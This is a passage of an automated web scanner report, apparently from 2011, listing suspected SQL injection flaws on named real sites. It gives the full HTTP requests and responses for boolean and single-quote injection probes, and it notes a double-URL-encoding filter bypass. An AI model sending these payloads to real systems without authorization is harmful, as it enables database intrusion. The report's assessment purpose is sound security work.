<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

1.5. http://bizinformation.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14947488%20or%201%3d1--%20 and 14947488%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico?114947488%20or%201%3d1--%20=1 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:16:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 514
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

Request 2

GET /favicon.ico?114947488%20or%201%3d2--%20=1 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:16:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 05 Oct 2010 10:04:29 GMT
ETag: "36e0002-e36-491dbc95ca540"
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: image/x-icon

..............h...&... ..............(....... ...........@............................rP......L1.........`A..............}b..kO..U9......{Z......tX...........y..xY..oQ..........dH..Q5...{..}^......vT..hJ..lL......nM..tV..X:..x\..........yX..O3..qT......qR......z].._..mO..uV..aE..T9......tS..{[......X<..sR..........xX..z\..pN..rT..vU..xV..z^..}]..|_..iM..kM..........wV..yX..zZ..y[..........pP..sS..wZ..|[..{]..{`..|`......uV......N2..R6..cG..lN..qO..rQ..sQ..uS..uV..wW..{Y..zZ..{^..M1..U8..V9..W:..X;..........................oM..sQ..rR..sR..tR..sT..uT..uT..vV..xW..wW..zY..xY..xZ..xZ..y[..z\..{\..{_..L1......U8......lN..oN..pN..qO..rO..qP..rP..sQ..tR..sS..tS..uS..uS..vT..uU..vU..wU..xV..wV..xW..xW..zX..yX..zY..xX..{Y..xX..zY..yY..{Z..{[..{\..z\..|`..}_.....................................................................................................................................................................................................................................................................................................................................................f..3...T[)fYYYYYh8.%..BUU2Z..ZZZ*QDeo....    .Eg.0L..!......4.$ijF~..m.#...7'F?\....n.S.=W;../..v}.P:.6dyM.G., 1a.<s.......bO..C{{.9-.pl.X
..RK@.I.xk....V...c((5.r.N.^.....wz...t....&N+....J..".q.H........|u..qq......_A`.._.>>>.>>..].u]....>>>>>>>>>>>>>]>]................................................................(... ...@........................................qN......H,.......|..\<...]..h..............lN...g..d?..S7..|W......vZ..........}^...................t..N...kH..dH.......`.......g..fE..wU..]B...v.......o..T4......oP..N2..^..tT.......n......|b..X;.
...[SNIP]...

1.6. http://bizinformation.com/images/fl/0.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.com
Path:   /images/fl/0.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14518373'%20or%201%3d1--%20 and 14518373'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /images14518373'%20or%201%3d1--%20/fl/0.gif HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:11:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 537
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /images14518373' or 1=1-- /fl/0.gif
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

Request 2

GET /images14518373'%20or%201%3d2--%20/fl/0.gif HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:11:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 533
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /images14518373' or 1=2-- /fl/0.gif was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

1.7. http://bizinformation.com/images/fl/0.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.com
Path:   /images/fl/0.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 13133889'%20or%201%3d1--%20 and 13133889'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /images/fl13133889'%20or%201%3d1--%20/0.gif HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:11:28 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 537
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /images/fl13133889' or 1=1-- /0.gif
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

Request 2

GET /images/fl13133889'%20or%201%3d2--%20/0.gif HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:11:28 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 533
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /images/fl13133889' or 1=2-- /0.gif was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

1.8. http://bizinformation.com/images/fl/0.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.com
Path:   /images/fl/0.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 44557888'%20or%201%3d1--%20 and 44557888'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /images/fl/0.gif44557888'%20or%201%3d1--%20 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:11:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 537
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /images/fl/0.gif44557888' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

Request 2

GET /images/fl/0.gif44557888'%20or%201%3d2--%20 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:11:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 533
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /images/fl/0.gif44557888' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

1.9. http://bizinformation.com/images/fl/0.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.com
Path:   /images/fl/0.gif

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10237900%20or%201%3d1--%20 and 10237900%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /images/fl/0.gif?110237900%20or%201%3d1--%20=1 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:11:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 518
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /images/fl/0.gif
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

Request 2

GET /images/fl/0.gif?110237900%20or%201%3d2--%20=1 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:11:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 514
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /images/fl/0.gif was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

1.10. http://googleads.g.doubleclick.net/pagead/ads [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The p parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the p parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /pagead/ads?client=ca-pub-5140108018215676&output=html&h=250&slotname=4535167573&w=300&lmt=1304337375&flash=10.2.154&url=http%3A%2F%2Fwww.japanator.com%2Felephant%2Flogin.phtml&dt=1304319374938&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304319375158&frm=0&adk=556830188&ga_vid=878351806.1304319358&ga_sid=1304319358&ga_hid=1733840726&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&ref=http%3A%2F%2Fwww.japanator.com%2Ffavicon.ico'&fu=0&ifi=2&dtd=463&xpc=6JH0KYKhlO&p=http%3A//www.japanator.com%2527 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 02:46:26 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13006

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#cc0000;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div class=adb>Avoid Failing checkpoints- assignments- finals</div>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-5140108018215676&output=html&h=250&slotname=4535167573&w=300&lmt=1304337375&flash=10.2.154&url=http%3A%2F%2Fwww.japanator.com%2Felephant%2Flogin.phtml&dt=1304319374938&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304319375158&frm=0&adk=556830188&ga_vid=878351806.1304319358&ga_sid=1304319358&ga_hid=1733840726&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&ref=http%3A%2F%2Fwww.japanator.com%2Ffavicon.ico'&fu=0&ifi=2&dtd=463&xpc=6JH0KYKhlO&p=http%3A//www.japanator.com%2527%2527 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 02:46:27 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13124

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#cc0000;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.11. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/index_cblogs-mini.phtml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant'/index_cblogs-mini.phtml?y=community&cblogs=1 HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:02:51 GMT
Server: lighttpd/1.4.28
Content-Length: 112250


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.12. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/index_cblogs-mini.phtml

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant/index_cblogs-mini.phtml'?y=community&cblogs=1 HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:03:14 GMT
Server: lighttpd/1.4.28
Content-Length: 112250


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.13. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant'/login.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:59:49 GMT
Server: lighttpd/1.4.28
Content-Length: 112217


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.14. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

